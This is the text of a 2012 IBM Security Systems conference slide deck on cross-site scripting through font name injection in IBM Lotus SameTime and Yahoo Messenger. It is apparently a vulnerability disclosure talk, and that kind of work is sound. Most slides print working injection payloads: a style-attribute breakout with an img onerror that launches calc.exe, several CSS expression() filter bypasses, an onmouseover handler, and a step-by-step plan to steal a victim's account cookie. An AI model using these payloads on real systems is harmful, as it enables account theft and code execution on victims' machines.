Download - Stylish XSS
© 2012 IBM Corporation
IBM Security Systems
1© 2012 IBM Corporation
Stylish XSSvia Font Name Injection
© 2012 IBM Corporation
IBM Security Systems
2
Background - Instant Messengers
© 2012 IBM Corporation
IBM Security Systems
3
Background - Instant Messengers
<Text Style="font-family:Segoe UI;font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
© 2012 IBM Corporation
IBM Security Systems
4
Background - Instant Messengers
Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
© 2012 IBM Corporation
IBM Security Systems
5
Background - Windows Fonts
Windows accepts basically any character as part of the font name
Font name length limited to ~30 chars
© 2012 IBM Corporation
IBM Security Systems
6
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;font-weight:normal;font-style:normal;">You Do!</span>
© 2012 IBM Corporation
IBM Security Systems
7
SameTime - Exploit - CSS
Font Name: expression(alert(1));
© 2012 IBM Corporation
IBM Security Systems
8
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:<span style= ";font-family:expression(alert(1));…">
Actual output:<span style="">
© 2012 IBM Corporation
IBM Security Systems
9
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:<span style="font-size:9pt;font-family:“onclick="alert(1)" ...">
Actual output:<span style="font-size:9pt;font-family:" onclick="">
© 2012 IBM Corporation
IBM Security Systems
10
SameTime - Exploit
~50 Fonts Later
© 2012 IBM Corporation
IBM Security Systems
11
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
12
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
13
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>
Message Received:
<span style=“…font-family:e0”><img x='>
© 2012 IBM Corporation
IBM Security Systems
14
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
15
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">'src='x' onerror='location="c:\\windows\\system32\\calc.exe" '
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
16
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\\windows\\system32\\calc.exe" '</span>
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\\windows\\system32\\calc.exe" '
</span>
© 2012 IBM Corporation
IBM Security Systems
17
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0"><img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:\\windows\\system32\\calc.exe"'</span>
© 2012 IBM Corporation
IBM Security Systems
18
Yahoo Messenger
© 2012 IBM Corporation
IBM Security Systems
19
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
© 2012 IBM Corporation
IBM Security Systems
20
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
21
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
22
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
© 2012 IBM Corporation
IBM Security Systems
23
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
© 2012 IBM Corporation
IBM Security Systems
24
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
© 2012 IBM Corporation
IBM Security Systems
25
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome, yields the same result.
© 2012 IBM Corporation
IBM Security Systems
26
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
© 2012 IBM Corporation
IBM Security Systems
27
Yahoo Messenger - Recap
1. Send the victim a message that contain malicious HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history or send him a direct link to it (after all, it not local)
4. Have the victim click the Instant Message from the drop-down box
© 2012 IBM Corporation
IBM Security Systems
28
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in real time!
© 2012 IBM Corporation
IBM Security Systems
29
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tagsent as part of the message text, is beingrendered differently in the Web Messenger.
• The message:<font face="xxx" size="20">33333</font>
• Was rendered as:<font style="font-size:20pt" face="xxx“id="yui_3_2_0_20_1330267588862427">33333</font>
© 2012 IBM Corporation
IBM Security Systems
30
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
© 2012 IBM Corporation
IBM Security Systems
31
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise the response came back as I hoped
<font style="font-size:1&color:red" >xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
32
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))" >xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&color:expression(alert(1))">xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
33
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
© 2012 IBM Corporation
IBM Security Systems
34
Yahoo Web Messenger - IE Version
© 2012 IBM Corporation
IBM Security Systems
35
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by double-quotes (" ")
2. The size value must be followed by the "pt;" suffix
<font size="15pt;"> <font style="font-size=15pt;">
© 2012 IBM Corporation
IBM Security Systems
36
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
© 2012 IBM Corporation
IBM Security Systems
37
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering
<font size="15pt;font-family:expression\(alert\(1\)\);">
© 2012 IBM Corporation
IBM Security Systems
38
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
© 2012 IBM Corporation
IBM Security Systems
39
Yahoo Web Messenger - IE Version
Yet somehow, no alert
© 2012 IBM Corporation
IBM Security Systems
40
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats with myself
I finally found out what I was afraid of.
Or in other words, The "No Expression For You" Meta Tag
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
© 2012 IBM Corporation
IBM Security Systems
41
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
© 2012 IBM Corporation
IBM Security Systems
42
Yahoo Web Messenger - Finally
© 2012 IBM Corporation
IBM Security Systems
43
Yahoo Messenger - History Window
© 2012 IBM Corporation
IBM Security Systems
44
Questions?